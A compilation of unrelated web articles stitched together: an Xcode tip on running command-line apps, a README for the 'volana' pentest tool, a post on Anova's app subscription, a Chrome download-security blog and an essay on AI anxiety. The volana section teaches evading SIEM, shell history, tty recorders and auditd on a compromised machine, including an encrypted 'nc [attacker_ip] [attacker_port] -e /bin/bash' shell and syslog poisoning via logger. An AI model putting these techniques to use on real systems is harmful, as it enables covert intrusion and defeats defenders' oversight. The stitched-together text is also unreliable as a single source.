
Executing command-line apps directly from Xcode — Erica Sadun


I got pulled into one of those conversations where I end up saying, "Fine, I'll write a post about it," and this is that post. Yes, you can test and run command-line apps directly from Xcode, but I pretty much never do. It's a pain with few benefits. That said, here's how you do it.

Arguments

Let's say you want arguments. Open your scheme (⌘<) and select the Run > Arguments tab. Add the arguments you want to pass on launch, one at a time. Double-click to edit any argument:

The arguments are vended by CommandLine.arguments. Either count the array or use CommandLine.argc to find out how many arguments you're dealing with.

print(CommandLine.arguments)
print(CommandLine.argc)

Counter-intuitively, Xcode doesn't automatically quote the arguments for you. This produces five arguments, not three, or six if you include the command itself:

["/Users/ericasadun/Library/Developer/Xcode/DerivedData/Test-gwehknnihlcsiucsovtbnlrdtfun/Build/Products/Debug/Test", "first", "second", "third", "fourth", "fifth"]
6
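
To see exactly what your process received, here is a minimal Swift sketch (my own illustration, not from the original post) that drops the executable path and prints each remaining entry verbatim:

// Drop argv[0] (the executable path) and list the remaining arguments
// exactly as the process received them.
let received = Array(CommandLine.arguments.dropFirst())
print("Received \(received.count) argument(s)")
for (index, argument) in received.enumerated() {
    print("argv[\(index + 1)] = '\(argument)'")
}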

And what do you expect from the following?

You get this if you run directly in Xcode's console:

["/Users/ericasadun/Library/Developer/Xcode/DerivedData/Test-gwehknnihlcsiucsovtbnlrdtfun/Build/Products/Debug/Test", "first", "several items at once", "third"]
4
Program ended with exit code: 0

However, if you set your code to execute using Terminal:

Launching: '/Users/ericasadun/Library/Developer/Xcode/DerivedData/Test-gwehknnihlcsiucsovtbnlrdtfun/Build/Products/Debug/Test'
Working directory: '/Users/ericasadun/Library/Developer/Xcode/DerivedData/Test-gwehknnihlcsiucsovtbnlrdtfun/Build/Products/Debug'
3 arguments:
argv[0] = '/Users/ericasadun/Library/Developer/Xcode/DerivedData/Test-gwehknnihlcsiucsovtbnlrdtfun/Build/Products/Debug/Test'
argv[1] = 'first'
argv[2] = 'several'
["/Users/ericasadun/Library/Developer/Xcode/DerivedData/Test-gwehknnihlcsiucsovtbnlrdtfun/Build/Products/Debug/Test", "first", "several"]
3
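
Since quoting differs between the two launch paths, a tool that wants to log its own invocation in shell-friendly form could re-quote whitespace before joining. This is again my own hypothetical sketch, not part of the original post; it simply keeps "several items at once" as a single token:

// Rebuild a shell-style command line: wrap arguments that contain spaces
// in double quotes so they round-trip as single tokens.
let rebuilt = CommandLine.arguments
    .map { $0.contains(" ") ? "\"\($0)\"" : $0 }
    .joined(separator: " ")
print(rebuilt)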

Xcode's Crazy Terminal Option

If you're running something with direct key input (using POSIX termios/raw mode) or curses, running in the console doesn't work. So Xcode offers a way to run these utilities in the Terminal. Go to Run > Options and scroll all the way down.

This feature is buggy as hell, produces ridiculous amounts of extra text (see this), can take significant time to launch, and even more time for Xcode to realize the process has finished. It's impossible to use with paths that contain spaces ("warning: working directory doesn't exist: '/Volumes/Kiku/Xcode/Derived'").

I don't like it. I don't use it. But it exists.

Sane Command-Line Execution

Unless you're dealing with things like automation and such, you can try out your compiled command-line apps by dragging the executable from the Products group onto the terminal. This places the path to your build at the prompt. Type out your arguments and press return:

However, I prefer to use a Copy Files build phase. Select your Target > Build Phases, click plus (+), and add the executable. (I use an absolute path and disable "only when installing".) This lets you install directly to standard locations like /usr/local/bin or ~/bin, or, if you don't want to place it there until it's stable and ready for deployment, you can use a development folder:

Assuming your destination is on your shell's path, start a new shell so the executable is picked up the first time. After that, you can compile and run as you like.

Shell Command Obfuscation to Avoid Detection Systems



Shell command obfuscation to avoid SIEM/detection systems

During a pentest, an important aspect is being stealthy. This means you must clear your tracks after your passage. However, many infrastructures log commands and ship them to a SIEM in real time, which makes the after-the-fact cleanup alone ineffective.

volana provides a simple way to hide commands executed on a compromised machine by providing its own shell runtime (enter your command, volana executes it for you). This way you clear your tracks DURING your passage.


Usage

You need an interactive shell. (Find a way to spawn it; you're a hacker, it's your job! otherwise...) Then download it on the target machine and launch it. That's it, now you can type the commands you want executed stealthily.

## Download it from the GitHub release
## If you don't have internet access from the compromised machine, find another way
curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana

## Execute it
./volana

## You are now under the radar
volana » echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1 # you are allowed to be a bit cocky
volana » [command]

Keywords for the volana console:
  • ring: enable ring mode, i.e. each command is launched along with many others to cover tracks (against solutions that monitor system calls)
  • exit: exit the volana console

From a non-interactive shell

Imagine you have a non-interactive shell (webshell or blind RCE); you can use the encrypt and decrypt subcommands. Beforehand, you must build volana with an embedded encryption key.

On the attacker machine

## Build volana with an encryption key
make build.volana-with-encryption

## Transfer it to the TARGET (the unique detectable command)
## [...]

## Encrypt the command you want to execute stealthily
## (Here, an nc bindshell to obtain an interactive shell)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND

Copy the encrypted command and execute it with your RCE on the target machine

./volana decr [encrypted_command]
## Now you have a bindshell; spawn it to make it interactive and use volana as usual to stay stealthy (./volana). + Don't forget to remove the volana binary before leaving (because the decryption key can easily be retrieved from it)

Why not simply hide the command with echo [command] | base64? And decode it on target with echo [encoded_command] | base64 -d | bash?

Because we want to be protected against systems that trigger alerts on base64 use or that search for base64 text in commands. Also, we want to make investigation difficult, and base64 isn't a real brake.

Detection

Keep in mind that volana isn't a miracle that will make you completely invisible. Its aim is to make intrusion detection and investigation harder.

By detected we mean being able to trigger an alert if a certain command has been executed.

Hidden from

Only the volana launching command line will be caught. 🧠 However, by adding a space before executing it, bash will not save it to history (the default behavior when HISTCONTROL includes ignorespace or ignoreboth, as on many distributions)

  • Detection systems that are based on history command output
  • Detection systems that are based on history files
  • .bash_history, .zsh_history, etc.
  • Detection systems that are based on bash debug traps
  • Detection systems that are based on the sudo built-in logging system
  • Detection systems tracing all processes' syscalls system-wide (e.g. opensnoop)
  • Terminal (tty) recorders (script, screen -L, sexonthebash, ovh-ttyrec, etc.)
  • Easy to detect & avoid: pkill -9 script
  • Not a common case
  • screen is a bit more difficult to avoid, however it doesn't record input (secret input: stty -echo => avoided)
  • Command detection could be avoided with volana with encryption

Visible to

  • Detection systems that alert on unknown commands (the volana one)
  • Detection systems that are based on keyloggers
  • Easy to avoid: copy/paste commands
  • Not a common case
  • Detection systems that are based on syslog files (e.g. /var/log/auth.log)
  • Only for sudo or su commands
  • syslog files could be modified and thus poisoned as you wish (e.g. for /var/log/auth.log: logger -p auth.info "No hacker is poisoning your syslog solution, don't worry")
  • Detection systems that are based on syscalls (e.g. auditd, LKML/eBPF)
  • Difficult to analyze; could be made unreadable by making numerous diversion syscalls
  • Custom LD_PRELOAD injection to create logs
  • Not a common case at all

Bug bounty

Sorry for the clickbait title, but no money will be offered to contributors. 🐛

Let me know if you have found:
  • a way to detect volana
  • a way to spy on a console that doesn't detect volana commands
  • a way to avoid a detection system

Report here

Credits



‘Everything is a subscription now’ includes the Anova sous vide



The world just went a little further down the road of everything becoming a subscription, with the news that the companion app for the Anova sous vide cooker will now cost $2/month or $10/year …

Sous vide cooking

For anyone unfamiliar, sous vide is a method of cooking food by vacuum-sealing it in a plastic bag, and then immersing it in water heated to a very precisely controlled temperature.

Because the food is completely sealed, all the flavor is retained, and the precise temperature control means that the cooking method delivers extremely consistent results.

Anova machine and app

Anova's sous vide machine comprises a programmable heating element and a companion app. The app lets you find the right temperatures and timings for different foods, control the machine remotely, and receive updates on your phone when the food is ready.

So far, that's been free, as you'd expect from a companion app intended to help sell hardware. But the company says that from tomorrow, new customers will have to pay for a monthly or annual subscription to use it.

The switch to subscription

Here's how the company explained the move:

As our community has grown, so have the demands on our resources. Our community has literally cooked hundreds of millions of times with our app. Unfortunately, every connected cook costs us money. So, to continue delivering the exceptional service and innovative recipes you've come to expect, we're introducing a small subscription fee for our app. The new Anova Sous Vide Subscription will allow us to maintain and improve the app, ensuring it remains a valuable resource for all of our users […]

The subscription will cost $1.99 per month or $9.99 per year USD.

The good news is that existing owners don't have to pay, and Anova says it intends (but doesn't promise) that this will always remain the case.

Existing customers who have an account with us before August 21st, 2024, will not be charged a subscription fee. To be an existing user, you must have downloaded our app AND made an account in the app before August 21st, 2024. In the event you're an existing user, you will be grandfathered in to free usage of the app. You helped us build Anova and our intent is that you will be grandfathered in forever.

9to5Mac’s Take

While I appreciate the company's position, I can't help feeling like this is a damaging move. While ten bucks a year is a small sum in the scheme of things, it's happening within the context of a growing feeling that we're hardly allowed to breathe these days without taking out an oxygen subscription.

I've been a happy Anova sous vide owner for several years now, and have recommended it to many (it's a fantastic way to cook beautifully tender steaks, for example, just browning them in a pan for a few seconds afterwards), but I'll now hesitate to do so.

What's your take? Please share your thoughts in the comments.


Building security into the redesigned Chrome downloads experience

Last year, we launched a redesign of the Chrome downloads experience on desktop to make it easier for users to interact with recent downloads. At the time, we mentioned that the additional space and more flexible UI of the new Chrome downloads experience would give us new opportunities to make sure users stay safe when downloading files.

Adding context and consistency to download warnings

The redesigned Chrome downloads experience gives us the opportunity to provide even more context when Chrome protects a user from a potentially malicious file. Taking advantage of the additional space available in the new downloads UI, we have replaced our previous warning messages with more detailed ones that convey more nuance about the nature of the danger and can help users make more informed decisions.

Our legacy, space-constrained warning vs. our redesigned one

We also made download warnings more understandable by introducing a two-tier download warning taxonomy based on AI-powered malware verdicts from Google Safe Browsing. These are:

  1. Suspicious files (lower confidence verdict, unknown risk of user harm)
  2. Dangerous files (high confidence verdict, high risk of user harm)

These two tiers of warnings are distinguished by iconography, color, and text, to make it easy for users to quickly and confidently make the best choice for themselves based on the nature of the danger and Safe Browsing's level of certainty. Overall, these improvements in clarity and consistency have resulted in significant changes in user behavior, including fewer warnings bypassed, warnings heeded more quickly, and, all in all, better protection from malicious downloads.

Differentiation between suspicious and dangerous warnings

Protecting more downloads with automatic deep scans

Users who have opted in to the Enhanced Protection mode of Safe Browsing in Chrome are prompted to send the contents of suspicious files to Safe Browsing for deep scanning before opening the file. Suspicious files represent a small fraction of overall downloads, and file contents are only scanned for security purposes and are deleted shortly after a verdict is returned.

We have found these additional scans to be extraordinarily successful – they help catch brand-new malware that Safe Browsing has not seen before and dangerous files hosted on brand-new sites. In fact, files sent for deep scanning are over 50x more likely to be flagged as malware than downloads in the aggregate.

Since Enhanced Protection users have already agreed to send a small fraction of their downloads to Safe Browsing for security purposes in order to benefit from additional protections, we recently moved towards automatic deep scans for these users rather than prompting each time. This will protect users from risky downloads while reducing user friction.

An automatic deep scan resulting in a warning

Staying ahead of attackers who hide in encrypted archives

Not all deep scans can be conducted automatically. A current trend in cookie theft malware distribution is packaging malicious software in an encrypted archive – a .zip, .7z, or .rar file, protected by a password – which hides file contents from Safe Browsing and other antivirus detection scans. In order to combat this evasion technique, we have introduced two protection mechanisms depending on the mode of Safe Browsing selected by the user in Chrome.

Attackers often make the passwords to encrypted archives available in places like the page from which the file was downloaded, or in the download file name. For Enhanced Protection users, downloads of suspicious encrypted archives will now prompt the user to enter the file's password and send it along with the file to Safe Browsing so that the file can be opened and a deep scan performed. Uploaded files and file passwords are deleted a short time after they are scanned, and all collected data is only used by Safe Browsing to provide better download protections.

Enter a file password to send an encrypted file for a malware scan

For those who use Standard Protection mode, which is the default in Chrome, we still wanted to provide some level of protection. In Standard Protection mode, downloading a suspicious encrypted archive will also trigger a prompt to enter the file's password, but in this case both the file and the password stay on the local device and only the metadata of the archive contents is checked with Safe Browsing. As such, in this mode, users are still protected as long as Safe Browsing had previously seen and categorized the malware.

The Chrome Security team works closely with Safe Browsing, Google's Threat Analysis Group, and security researchers from around the world to gain insights into the techniques attackers are using. Using these insights, we are constantly adapting our product strategy to stay ahead of attackers and to keep users safe while downloading files in Chrome. We look forward to sharing more in the future!

Artificial intelligence, real anxiety: Why we can't stop worrying and love AI



Abstract graphic of people looking at binary code. Image: zf L/Getty Images

Did an AI write this piece? 

Questions like this were a nice quip when generative artificial intelligence (gen AI) began its foray into mainstream discourse. Two years later, while people around the globe use AI for all kinds of activities, others are raising important questions about the emerging technology's long-term impact.

Last month, fans of the popular South Korean band Seventeen took issue with a BBC article that wrongly implied the group had used AI in its songwriting. Woozi, a band member and the main creative mind behind most of the band's music, told reporters he had experimented with AI to understand the development of the technology and identify its pros and cons.

Also: Lost in translation: AI chatbots still too English-language centric, Stanford study finds

The BBC misconstrued the experimentation to suggest Seventeen had used AI in its latest album release. Unsurprisingly, the mistake caused a furor, with fans taking particular offense because Seventeen has been championed as a "self-producing" band since its musical debut. Its 13 members are involved in the group's songwriting, music production, and dance choreography.

Their fans saw the AI tag as discrediting the group's creative minds. "[Seventeen] write, produce, choreograph! They're talented… and certainly are not in need of AI or anything else," one fan said on X, while another described the AI label as an insult to the group's efforts and success.

The episode prompted Woozi to post on his Instagram Stories: "All of Seventeen's music is written and composed by human creators."

Women, peace, and security

Of course, AI as a perceived affront to human creativity isn't the only concern about this technology's ever-accelerating impact on our world — and it is arguably far from the biggest concern. Systemic issues surrounding AI could — potentially — threaten the safety and well-being of large swaths of the world's population.

Specifically, as the technology is adopted, AI can put women's safety at risk, according to recent research from UN Women and the UN University Institute in Macau (UNU Macau). The study noted that gender biases across popular AI systems pose significant obstacles to the positive use of AI to support peace and security in regions such as Southeast Asia.

The May 2024 study analyzed links between AI; digital security; and women, peace, and security issues across Southeast Asia. AI is expected to boost the region's gross domestic product by $1 trillion in 2030.

Also: AI risks are everywhere – and now MIT is adding them all to one database

"While using AI for peace purposes can have multiple benefits, such as improving inclusivity and the effectiveness of conflict prevention and tracking evidence of human rights breaches, it is used unequally between genders, and pervasive gender biases render women less likely to benefit from the application of these technologies," the report said.

Efforts should be made to mitigate the risks of using AI systems, particularly on social media and in tools such as chatbots and mobile applications, according to the report. Efforts also should be made to drive the development of AI tools to support "gender-responsive peace."

The research noted that tools enabling the public to create text, images, and videos have been made widely available without consideration of their implications for gender or national or international security.

Also: If these chatbots could talk: The most popular ways people are using AI tools

"Gen AI has benefited from the publishing of large language models such as ChatGPT, which allow users to request text that can be calibrated for tone, values, and format," it said. "Gen AI poses the risk of accelerating disinformation by facilitating the rapid creation of authentic-seeming content at scale. It also makes it very easy to create convincing social media bots that intentionally share polarizing, hateful, and misogynistic content."

The research cited a 2023 study in which researchers from the Association for Computational Linguistics found that when ChatGPT was supplied with 100 false narratives, it made false claims 80% of the time.

The UN report highlighted how researchers worldwide have cautioned about the risks of deepfake pornography and extremist content for several years. However, recent developments in AI have escalated the severity of the problem.

"Image-generating AI systems have been shown to easily produce misogynistic content, including creating sexualized bodies for women based on profile photos, or images of people performing certain activities based on sexist and racist stereotypes," the UN Women report noted.

"These technologies have enabled the easy and convincing creation of deepfake videos, where false videos can be created of anyone based only on photo references. This has caused significant concerns for women, who can be shown, for example, in fake sexualized videos against their consent, incurring lifelong reputational and safety-related repercussions."

When real-world fears move online

A January 2024 study from information security specialist CyberArk also suggested concerns about the integrity of digital identities are on the rise. The survey of 2,000 workers in the UK found that 81% of employees are worried about their visual likeness being stolen or used to conduct cyberattacks, while 46% are concerned about their likeness being used in deepfakes.

Specifically, 81% of women are concerned about cybercriminals using AI to steal confidential data through digital scams, higher than the 74% of men who share similar concerns. More women (46%) also worry about AI being used to create deepfakes, compared to 38% of men who feel this way.

CyberArk's survey found that 50% of women are anxious about AI being used to impersonate them, higher than the 40% of men who have similar concerns. What's more, 59% of women are worried about AI being used to steal their personal information, compared to 50% of men who feel likewise.

Also: Millennial men are most likely to sign up for gen AI upskilling courses, report shows

I met with CyberArk COO Eduarda Camacho, and our discussion touched on why women harbor more anxiety about AI. Shouldn't women feel safer on digital platforms because they don't have to reveal their traits, such as gender?

Camacho suggested that women may be more aware of the risks online, and that these concerns could be a spillover from the vulnerabilities some women feel offline. She said women are typically more targeted and exposed to online abuse and misinformation on social media platforms.

The anxiety isn't unfounded, either. Camacho said AI can significantly impact online identities. CyberArk specializes in identity management and is particularly concerned about this issue.

Specifically, deepfakes can be difficult to detect as the technology advances. While 70% of organizations are confident their employees can identify deepfakes of their leadership team, Camacho said this figure is likely an overestimation, referring to evidence from CyberArk's 2024 Threat Landscape Report.

Also: These experts believe AI can help us win the cybersecurity battle

A separate July 2024 study from digital identity management vendor Jumio found 46% of respondents believed they could identify a deepfake of a politician. Singaporeans are the most confident, at 60%, followed by people from Mexico at 51%, the US at 37%, and the UK at 33%.

Allowed to run rampant and unhinged on social media platforms, AI-generated fraudulent content can lead to social unrest and detrimentally impact societies, including vulnerable groups. Such content can spread quickly when shared by personalities with a large online presence.

Research released last week revealed that Elon Musk's claims about the US elections — claims that were flagged as false or misleading — had been viewed almost 1.2 billion times on his social media platform X, according to research from the Center for Countering Digital Hate (CCDH). From January 1 to July 31, CCDH analyzed Musk's posts about the elections and identified 50 posts that fact-checkers had debunked.

Musk's post on an AI-generated audio clip featuring US presidential nominee Kamala Harris clocked at least 133 million views. The post wasn't tagged with a warning label, breaching the platform's policy that says users should "not share synthetic, manipulated, or out-of-context media that may deceive or confuse people and lead to harm," CCDH said.

"The lack of Community Notes on these posts shows [Musk's] business is failing woefully to contain the kind of algorithmically boosted incitement that we all know can lead to real-world violence, as we experienced on January 6, 2021," said CCDH CEO Imran Ahmed. "It's time Section 230 of the [US] Communications Decency Act 1986 was amended to allow social media companies to be held liable in the same way as any newspaper, broadcaster or business across America."

Also disconcerting is how the tech giants are jockeying for even greater power and influence.

"Watching what's happening in Silicon Valley is insane," American businessman and investor Mark Cuban said in an interview on The Daily Show. "[They're] trying to put themselves in a position to have as much control as possible. It's not a good thing."

"They've lost the connection with the real world," Cuban said.

Also: Elon Musk's X now trains Grok on your data by default – here's how to opt out

He also said the online reach of X gives Musk the ability to connect with political leaders globally, along with an algorithm that depends on what Musk likes.

When asked where he thought AI is heading, Cuban pointed to the technology's rapid evolution and said it remains unclear how large language models will drive future developments. While he believes the impact will be generally positive, he said there are plenty of uncertainties.

Act before AI's grip tightens beyond control

So, how should we proceed? First, we should move past the misconception that AI is the solution to life's challenges. Businesses are just starting to move beyond that hyperbole and are working to determine the real value of AI.

Also, we should appreciate that, amid the desire for AI-powered hires and productivity gains, some level of human creativity is still valued above AI — as Seventeen and the band's fans have made abundantly clear.

For some, however, AI is embraced as a way to cross language barriers. Irish boy band Westlife, for instance, released their first Mandarin-language title, which was performed by their AI-generated vocal representatives and dubbed AI Westlife. The song was created in partnership with Tencent Music Entertainment Group.

Also: Nvidia will train 100,000 California residents on AI in a first-of-its-kind partnership

Most importantly, as the UN report urges, systemic issues with AI must be addressed — and these concerns aren't new. Organizations and individuals alike have repeatedly highlighted these challenges, along with multiple calls for the necessary guardrails to be put in place. Governments will need the proper regulations and enforcement to rein in the delinquents.

And they must do so quickly, before AI's grip tightens beyond control and all of society, not just women, is faced with lifelong safety repercussions.